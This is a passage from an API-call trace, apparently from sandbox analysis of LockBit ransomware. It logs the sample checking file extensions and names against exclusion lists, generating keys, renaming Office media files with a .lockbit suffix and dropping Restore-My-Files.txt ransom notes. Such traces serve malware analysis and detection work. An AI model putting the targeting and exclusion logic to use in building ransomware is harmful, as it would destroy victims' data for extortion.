lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.819] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18218_.WMF") returned 1 [0200.819] lstrcmpiW (lpString1="ntldr", lpString2="BD18218_.WMF") returned 1 [0200.819] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18218_.WMF") returned 1 [0200.819] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18218_.WMF") returned 1 [0200.819] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18218_.WMF") returned -1 [0200.819] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18218_.WMF") returned 1 [0200.819] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18218_.WMF") returned 1 [0200.819] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.819] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18218_.WMF") returned=".WMF" [0200.819] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.819] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.820] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.820] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.820] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18218_.WMF.lockbit") returned 79 [0200.820] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18218_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18218_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0200.822] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.822] malloc (_Size=0x40068) returned 0x1ff1e60 [0200.822] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4626) returned 1 [0200.822] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0200.822] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.823] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0200.823] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.826] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18218_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18218_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.826] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.826] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.829] free (_Block=0x1fa2ed8) [0200.829] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18218_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.829] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.830] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f247600, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbcc25d20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4f247600, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0x1136, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18219_.WMF", cAlternateFileName="")) returned 1 [0200.830] lstrcmpiW (lpString1=".", lpString2="BD18219_.WMF") returned -1 [0200.830] lstrcmpiW (lpString1="..", lpString2="BD18219_.WMF") returned -1 [0200.830] PathFindExtensionW (pszPath="BD18219_.WMF") returned=".WMF" [0200.830] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.830] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.831] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.831] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18219_.WMF") returned 1 [0200.831] lstrcmpiW (lpString1="ntldr", lpString2="BD18219_.WMF") returned 1 [0200.831] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18219_.WMF") returned 1 [0200.831] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18219_.WMF") returned 1 [0200.832] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18219_.WMF") returned -1 [0200.832] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18219_.WMF") returned 1 [0200.832] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18219_.WMF") returned 1 [0200.832] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.832] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18219_.WMF") returned=".WMF" [0200.832] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.832] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.832] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.833] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.833] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.833] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.833] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.833] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18219_.WMF.lockbit") returned 79 [0200.833] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18219_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18219_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0200.834] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.834] malloc (_Size=0x40068) returned 0x3d70450 [0200.834] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4406) returned 1 [0200.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0200.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0200.835] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0200.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18219_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18219_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.838] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.838] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.840] free (_Block=0x1fa2ed8) [0200.840] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18219_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.840] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.840] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aadf500, ftCreationTime.dwHighDateTime=0x1bddca5, ftLastAccessTime.dwLowDateTime=0xbcc25d20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2aadf500, ftLastWriteTime.dwHighDateTime=0x1bddca5, nFileSizeHigh=0x0, nFileSizeLow=0x213c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18220_.WMF", cAlternateFileName="")) returned 1 [0200.840] lstrcmpiW (lpString1=".", lpString2="BD18220_.WMF") returned -1 [0200.840] lstrcmpiW (lpString1="..", lpString2="BD18220_.WMF") returned -1 [0200.840] PathFindExtensionW (pszPath="BD18220_.WMF") returned=".WMF" [0200.840] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.840] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.840] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.840] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.840] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.840] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.840] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.841] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.841] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18220_.WMF") returned 1 [0200.842] lstrcmpiW (lpString1="ntldr", lpString2="BD18220_.WMF") returned 1 [0200.842] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18220_.WMF") returned 1 [0200.842] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18220_.WMF") returned 1 [0200.842] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18220_.WMF") returned -1 [0200.842] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18220_.WMF") returned 1 [0200.842] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18220_.WMF") returned 1 [0200.842] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.842] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18220_.WMF") returned=".WMF" [0200.842] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.842] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.842] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.843] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.843] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18220_.WMF.lockbit") returned 79 [0200.843] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18220_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18220_.wmf"), dwDesiredAccess=0xc0010000, 